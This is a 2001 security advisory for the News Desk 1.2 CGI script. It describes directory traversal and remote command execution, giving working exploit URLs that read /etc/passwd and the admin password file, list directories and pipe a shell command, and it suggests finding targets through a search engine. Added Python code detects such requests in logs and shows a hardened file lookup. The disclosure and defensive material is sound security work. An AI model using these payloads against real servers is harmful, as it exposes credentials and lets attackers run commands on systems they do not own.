From: B10Z Security (pathNS.SYMPATICO.CA)
Date: Wed Jan 03 2001 - 19:00:17 CST


    Introduction:

    News Desk 1.2 (newsdesk.cgi) is a news submission
    script written in Perl. It lets someone on a remote
    computer connect to the server and post news
    submissions without logging into the server itself.
    By logging into the CGI with a custom login and
    password (stored in pass.txt), the admin can post
    the latest headline news to the website with ease.

    The vendor's website is:
    http://www.ibrow.com

    Problem:

    Adding the string "/../" to the URL allows an attacker to
    view any file on the server, and also to list directories
    on the server, limited only by what the user the
    vulnerable httpd runs as has permission to access.

    Examples:

    http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
    t=../../../../etc/passwd
    ^^ = Opens the passwd file. It only contains password
    hashes if the system does not use shadow passwords.

    http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
    t=../pass.txt
    ^^ = Opens the password string, which can be used
    to log in to newsdesk.cgi and post news or, with
    special variables, to upload/post HTML to the
    htdocs directory, possibly leading to a defacement
    of the web page.

    http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
    t=../../../../etc/
    ^^ = Lists the /etc/ directory. Not all servers will
    list directories, but most appear to.

    Note: It depends on where newsdesk.cgi is installed;
    it is not always in a cgi-bin, so it could be under
    any path. Just go to your favorite search engine,
    search for newsdesk.cgi, and voila. There are also
    other variants of this CGI script out there; most
    of them are recognisable by the news.cgi?
    a=something&t=meow.html format. The a= and
    t= parameters are a clear give-away for Newsdesk.
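As an added detection example (not part of the original advisory), the following Python reads web-server access-log lines in the common log format, picks out requests aimed at newsdesk.cgi or the news.cgi variant described above, and flags any parameter value that contains a directory-traversal component or a shell metacharacter. The log lines are constructed for this example; the script names and the a=/t= parameter format are the ones the advisory names.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/NCSA common log format:
#   host ident authuser [date] "METHOD target PROTOCOL" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Script names from the advisory: newsdesk.cgi and its news.cgi variant.
WATCHED_SCRIPTS = {"newsdesk.cgi", "news.cgi"}
# '..' as a whole path component, with either separator.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Characters that matter if a value ever reaches a shell or a Perl open().
SHELL_META = re.compile(r"[|;`$&<>]")

# Constructed sample log; the hosts, times and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jan/2001:19:00:17 -0600] "GET /cgi-bin/newsdesk.cgi?t=meow.html HTTP/1.0" 200 1542
10.0.0.9 - - [03/Jan/2001:19:01:02 -0600] "GET /cgi-bin/newsdesk.cgi?t=../../../../etc/passwd HTTP/1.0" 200 2211
10.0.0.9 - - [03/Jan/2001:19:01:10 -0600] "GET /cgi-bin/newsdesk.cgi?t=../pass.txt HTTP/1.0" 200 83
10.0.0.9 - - [03/Jan/2001:19:01:33 -0600] "GET /news/news.cgi?a=view&t=..%2F..%2F..%2Fbin%2Fls%20%2F%7C HTTP/1.0" 200 975
10.0.0.7 - - [03/Jan/2001:19:02:00 -0600] "GET /index.html HTTP/1.0" 200 4096
"""


def inspect_target(target):
    """Return the reasons a request target looks like abuse of the script,
    or an empty list if it is clean or not aimed at a watched script."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in WATCHED_SCRIPTS:
        return []
    reasons = []
    # parse_qs percent-decodes once; decoding a second time also catches
    # doubly encoded values (%252e%252e) meant to slip past a raw-text match.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)
            if TRAVERSAL.search(decoded):
                reasons.append(f"{name}: directory traversal")
            if SHELL_META.search(decoded):
                reasons.append(f"{name}: shell metacharacter")
    return reasons


def scan_log(lines):
    """Run inspect_target over each parsable log line; return the hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_target(m["target"])
        if reasons:
            hits.append({
                "host": m["host"],
                "time": m["time"],
                "target": m["target"],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit["host"], hit["status"], hit["target"], "; ".join(hit["reasons"]))
```

The status code is kept in each hit because it separates a probe from a likely success: a 200 on a traversal request means the script served something, while a 404 or 500 on the same request is only reconnaissance.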

    Solution:

    The vendor has been contacted and will release an
    updated version which is supposed to be more
    secure...

    Special Thanks to:
    zenomorph <http://www.cgisecurity.com>

    who contributed this:

    Remote command execution is possible on most
    sites if you use the correct directory syntax, such
    as ../../../bin/ls%20/|, which is a working example; many
    more commands are possible if you play around with
    it a bit, such as spawning xterms.
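The checks a fixed version of such a script needs, shown as an added example in Python rather than the script's own Perl (the advisory does not show the vulnerable code, and none of this is the vendor's code): the t value is matched against a strict allow-list, resolved with realpath and confirmed to sit directly inside an assumed news directory, directories are refused, and the file is opened with the file API so the name is never interpreted. That covers the ../ traversal and directory listing from the Problem section and the trailing | in zenomorph's example, which is the classic sign of a Perl two-argument open() being handed user input. The directory path, file names and the symlink used in demo() are all constructed for the example.

```python
import os
import re
import tempfile
from pathlib import Path

# Assumed location of the news files; the real script's layout is not known.
NEWS_ROOT = Path("/var/www/newsdesk/news")

# Allow-list for the 't' parameter: a plain .html file name and nothing else.
# This rejects '/', '\\', '..', '%', '|', spaces and every other metacharacter
# before the value gets anywhere near the filesystem or a shell.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.html")


class RejectedName(ValueError):
    """Raised for any 't' value that does not name a file inside the news root."""


def resolve_news_file(t_param, root=NEWS_ROOT):
    """Map the 't' query parameter to a path strictly inside root.

    Two independent layers: the allow-list on the raw string, then a
    realpath containment check that also catches a symlink inside root
    that points somewhere outside it.
    """
    if not SAFE_NAME.fullmatch(t_param):
        raise RejectedName(f"name not allowed: {t_param!r}")
    root_real = Path(os.path.realpath(root))
    target = Path(os.path.realpath(root_real / t_param))
    if target.parent != root_real:
        raise RejectedName(f"resolves outside the news directory: {t_param!r}")
    return target


def is_allowed(t_param, root=NEWS_ROOT):
    """True if the value passes both layers of resolve_news_file()."""
    try:
        resolve_news_file(t_param, root)
        return True
    except RejectedName:
        return False


def read_news(t_param, root=NEWS_ROOT):
    """Return the file's bytes. Opening through the file API means a name is
    only ever a name; it is never handed to a shell or a pipe."""
    path = resolve_news_file(t_param, root)
    if not path.is_file():  # refuses directories, so no listings
        raise RejectedName(f"not a regular file: {t_param!r}")
    with open(path, "rb") as fh:
        return fh.read()


def demo():
    """Build a throw-away news directory and exercise the checks.
    Returns {probe: accepted} so the outcome can be checked programmatically."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "news"
        root.mkdir()
        (root / "today.html").write_bytes(b"<h1>headline</h1>")
        outside = Path(tmp) / "secret.txt"
        outside.write_bytes(b"not for the web")
        # A symlink that passes the name allow-list but escapes the directory.
        (root / "link.html").symlink_to(outside)
        probes = [
            "today.html",               # legitimate news page
            "link.html",                # symlink escaping the root
            "../../../../etc/passwd",   # advisory example 1
            "../pass.txt",              # advisory example 2
            "../../../../etc/",         # advisory example 3
            "../../../bin/ls /|",       # contributed pipe example, URL-decoded
        ]
        results = {}
        for probe in probes:
            try:
                results[probe] = read_news(probe, root) is not None
            except RejectedName:
                results[probe] = False
        return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print("accepted" if ok else "rejected", repr(name))
```

The allow-list alone would already stop every string in the advisory; the realpath check is there for the case the allow-list cannot see, a file inside the news directory that is really a link to something outside it.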

    --------------------
    Found By:

    b10z cgi advisory.
    slipyb10z.net

    Found on December 10th, 2000.
    Posted to BugTraq Jan 3rd, 2001.